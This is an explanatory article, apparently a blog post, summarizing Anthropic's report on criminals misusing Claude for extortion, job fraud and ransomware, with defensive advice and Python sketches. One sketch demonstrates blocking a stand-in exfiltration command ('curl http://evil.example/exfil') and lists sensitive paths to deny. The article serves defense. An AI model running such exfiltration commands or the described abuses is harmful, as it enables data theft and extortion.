Anthropic reveals abuses of Claude and new defenses

On August 27, 2025, Anthropic published a report detailing how malicious actors are using its models, including Claude and Claude Code, to commit extortion, carry out employment fraud and create ransomware without much technical expertise. Why should you care even if you're not an engineer? Because AI is no longer just a productivity tool: it also lowers the barrier to crime and changes how we need to protect ourselves. (anthropic.com)

Three cases you should know

Anthropic summarizes three real operations that show a qualitative leap in how language models are abused. I'll explain them without jargon and with the essentials so you understand the risk.

  • Mass extortion with 'agentic AI': an actor used Claude Code to automate discovery and credential theft, and to decide tactically which data to exfiltrate and how much to demand as ransom. In some cases the demands exceeded 500,000 USD. This wasn't just a script: the model helped craft extortion notes and calculate the amounts. (anthropic.com)

  • Employment fraud tied to North Korea: operators created fake identities, passed technical interviews and completed real work by leveraging AI to generate technical answers and communicate in English. The impact: schemes that previously required years of training can now scale quickly. (anthropic.com)

  • 'No-code' ransomware for sale: an author used AI to develop ransomware variants with advanced evasion techniques and sold them for 400 to 1,200 USD on forums. According to Anthropic, without AI assistance that actor could not have implemented or debugged the critical components. (anthropic.com)

What's new here?

What changes is the nature of the attacker. Before, many of these attacks required expert teams; now, agentic-capable tools let a single person, or a small group, run complex operations. Surprised? That shift also complicates defense, because these tools can adapt in real time. (anthropic.com)

How Anthropic responded (and why it matters)

The company didn't just describe the abuses: it took operational steps. Among the measures it reports are:

  • Blocking and banning accounts related to the malicious operations.
  • Developing custom classifiers and new detection techniques to identify similar activity.
  • Sharing technical indicators with authorities and partners to help mitigate harm beyond their platform.

These responses show two things: first, model providers can detect sophisticated patterns; second, collaboration with third parties and systemic security measures are essential. (anthropic.com)

What should companies and security teams do?

You don't need to become an AI expert to improve defense. Some practical actions:

  1. Review your remote hiring processes: verify identities and ask for reproducible work samples, not just automated interviews.
  2. Monitor exfiltration indicators and unusual access patterns to sensitive data (the first sketch below shows one way to start).
  3. Limit agentic capabilities in internal integrations: control when and how an automated agent can run commands or access critical systems (see the second sketch below).
  4. Share abuse signals with industry and authorities: shared intelligence means a detection at one provider can protect others.
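
To make point 2 concrete, here is a minimal sketch of what "unusual access patterns" can look like in code: compare each account's daily volume of sensitive-data reads against its own recent baseline and flag sudden spikes. The field names, sample records and 3x threshold are illustrative assumptions, not something taken from Anthropic's report; in practice you would feed this from your SIEM or database audit logs.

```python
# Minimal sketch: flag accounts whose access volume to sensitive data
# suddenly spikes above their own recent baseline. Field names, the
# sample records and the 3x threshold are illustrative assumptions.
from collections import defaultdict
from statistics import mean

# Example access-log records: (day, user, number of sensitive records read)
access_log = [
    ("2025-08-20", "alice", 12), ("2025-08-21", "alice", 15),
    ("2025-08-22", "alice", 14), ("2025-08-23", "alice", 90),  # spike
    ("2025-08-20", "bob", 40), ("2025-08-21", "bob", 38),
    ("2025-08-22", "bob", 42), ("2025-08-23", "bob", 41),
]

SPIKE_FACTOR = 3  # flag when a day exceeds 3x the user's prior average

def find_exfiltration_candidates(log):
    """Return (user, day, count) tuples where access volume spikes."""
    per_user = defaultdict(list)
    for day, user, count in sorted(log):
        per_user[user].append((day, count))

    alerts = []
    for user, rows in per_user.items():
        for i, (day, count) in enumerate(rows):
            history = [c for _, c in rows[:i]]
            if history and count > SPIKE_FACTOR * mean(history):
                alerts.append((user, day, count))
    return alerts

if __name__ == "__main__":
    for user, day, count in find_exfiltration_candidates(access_log):
        print(f"ALERT: {user} read {count} sensitive records on {day}")
```

In production you would tune the threshold per data source and route alerts into your existing incident workflow, but the core idea stays the same: exfiltration usually looks like an account suddenly reading far more than it normally does.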

These recommendations combine traditional security best practices with steps specific to the arrival of advanced AI.
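
Point 3 lends itself to a similar sketch: put a small policy layer between the agent and the systems it can touch, so only a short allowlist of commands runs automatically and everything else waits for human approval. This is a deliberately simplified illustration under my own assumptions: the allowlist, the blocked paths and the approval flag are placeholders, not the interface of any particular agent framework.

```python
# Minimal sketch of point 3: gate every command an automated agent wants
# to run through an allowlist, and require human approval for anything
# else. The allowlist, blocked paths and approval flag are hypothetical
# placeholders, not a specific vendor API.
import shlex
import subprocess

ALLOWED_COMMANDS = {"ls", "cat", "grep", "git"}   # read-mostly tools
BLOCKED_PATHS = ("/etc/", "/home/", "secrets")    # never touch these

def run_agent_command(command: str, approved_by_human: bool = False):
    """Execute an agent-proposed command only if policy allows it."""
    parts = shlex.split(command)
    if not parts:
        raise ValueError("empty command")

    program = parts[0]
    touches_blocked = any(p in arg for arg in parts for p in BLOCKED_PATHS)

    if program not in ALLOWED_COMMANDS or touches_blocked:
        if not approved_by_human:
            raise PermissionError(
                f"Command requires human approval: {command!r}"
            )

    # Log every execution so agent activity stays auditable.
    print(f"[agent-exec] {command}")
    return subprocess.run(parts, capture_output=True, text=True, timeout=30)

if __name__ == "__main__":
    run_agent_command("ls -l")                                # allowed
    try:
        run_agent_command("curl http://evil.example/exfil")   # not allowed
    except PermissionError as err:
        print(err)
```

The design choice that matters here is deny-by-default: the agent gets a narrow, auditable set of capabilities, and anything outside it needs a human in the loop.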

And what can you expect in the near future?

Anthropic warns that this kind of abuse is likely to grow, because AI lowers the technical barrier and enables scale. Does that mean we're helpless? No. The same technology can be used to detect anomalies, strengthen authentication and automate defensive responses. But the balance will stay dynamic: as defenses improve, attacker tactics will evolve too. (anthropic.com)

For anyone who wants the technical indicators and full details, Anthropic published the complete report the same day. Read the full report. (anthropic.com)
